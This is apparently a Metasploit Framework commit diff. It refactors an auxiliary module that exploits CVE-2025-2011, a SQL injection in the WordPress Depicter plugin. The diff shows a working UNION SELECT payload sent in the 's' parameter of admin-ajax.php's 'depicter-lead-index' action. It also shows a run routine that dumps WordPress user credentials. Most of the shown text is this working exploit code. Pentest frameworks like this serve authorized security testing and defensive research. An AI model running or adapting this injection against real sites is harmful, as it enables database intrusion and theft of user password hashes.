Merge pull request rapid7#20382 from Chocapikk/depicter-fix

dledda-r7 · web-flow · commit be3d77715ebc · 2025-08-18T12:08:45.000+02:00
Fix `auxiliary/gather/wp_depicter_sqli_cve_2025_2011`
diff --git a/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb b/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb
@@ -21,8 +21,8 @@ def initialize(info = {})
           in admin-ajax.php.
         },
         'Author' => [
-          'Muhamad Visat',     # Vulnerability Discovery
-          'Valentin Lobstein'  # Metasploit Module
+          'Muhamad Visat',     # Vulnerability discovery
+          'Valentin Lobstein'  # Metasploit module
         ],
         'License' => MSF_LICENSE,
         'References' => [
@@ -31,10 +31,6 @@ def initialize(info = {})
           ['URL', 'https://cloud.projectdiscovery.io/library/CVE-2025-2011'],
           ['URL', 'https://plugins.trac.wordpress.org/browser/depicter/trunk/app/src/Controllers/Ajax/LeadsAjaxController.php?rev=3156664#L179']
         ],
-        'Actions' => [
-          ['SQLi', { 'Description' => 'Perform SQL Injection via admin-ajax.php?s=' }]
-        ],
-        'DefaultAction' => 'SQLi',
         'DefaultOptions' => {
           'VERBOSE' => true,
           'COUNT' => 1
@@ -60,29 +56,34 @@ def get_sqli_object
       r1, r2, r3, r4, r5 = Array.new(5) { rand(1000..9999) }
       injected = "#{r1}') UNION SELECT #{r2},#{r3},(#{expr}),#{r4},#{r5}-- -"
 
-      endpoint = normalize_uri('wp-admin', 'admin-ajax.php')
-      params = {
-        'action' => 'depicter-lead-index',
-        's' => injected,
-        'perpage' => rand(10..50).to_s,
-        'page' => rand(1..3).to_s,
-        'orderBy' => 'source_id',
-        'order' => ['ASC', 'DESC'].sample,
-        'dateStart' => '',
-        'dateEnd' => '',
-        'sources' => ''
-      }
       res = send_request_cgi(
         'method' => 'GET',
-        'uri' => endpoint,
-        'vars_get' => params
+        'uri' => normalize_uri('wp-admin', 'admin-ajax.php'),
+        'vars_get' => {
+          'action' => 'depicter-lead-index',
+          's' => injected,
+          'perpage' => rand(10..50).to_s,
+          'page' => rand(1..3).to_s,
+          'orderBy' => 'source_id',
+          'order' => %w[ASC DESC].sample,
+          'dateStart' => '',
+          'dateEnd' => '',
+          'sources' => ''
+        }
       )
-      return GET_SQLI_OBJECT_FAILED_ERROR_MSG unless res&.code == 200
 
-      extracted = res.get_json_document.dig('hits', 0, 'content', 'id')
-      return GET_SQLI_OBJECT_FAILED_ERROR_MSG if extracted.to_s.empty?
+      next GET_SQLI_OBJECT_FAILED_ERROR_MSG unless res&.code == 200
+
+      doc = res.get_json_document
+      value = if doc.respond_to?(:dig)
+                doc.dig('hits', 0, 'content', 'id')
+              else
+                GET_SQLI_OBJECT_FAILED_ERROR_MSG
+              end
 
-      extracted
+      next GET_SQLI_OBJECT_FAILED_ERROR_MSG if value.to_s.empty?
+
+      value
     end
   end
 
@@ -96,6 +97,9 @@ def check
 
   def run
     @sqli ||= get_sqli_object
+    if @sqli == GET_SQLI_OBJECT_FAILED_ERROR_MSG
+      fail_with(Failure::UnexpectedReply, @sqli)
+    end
     wordpress_sqli_initialize(@sqli)
     wordpress_sqli_get_users_credentials(datastore['COUNT'])
   end
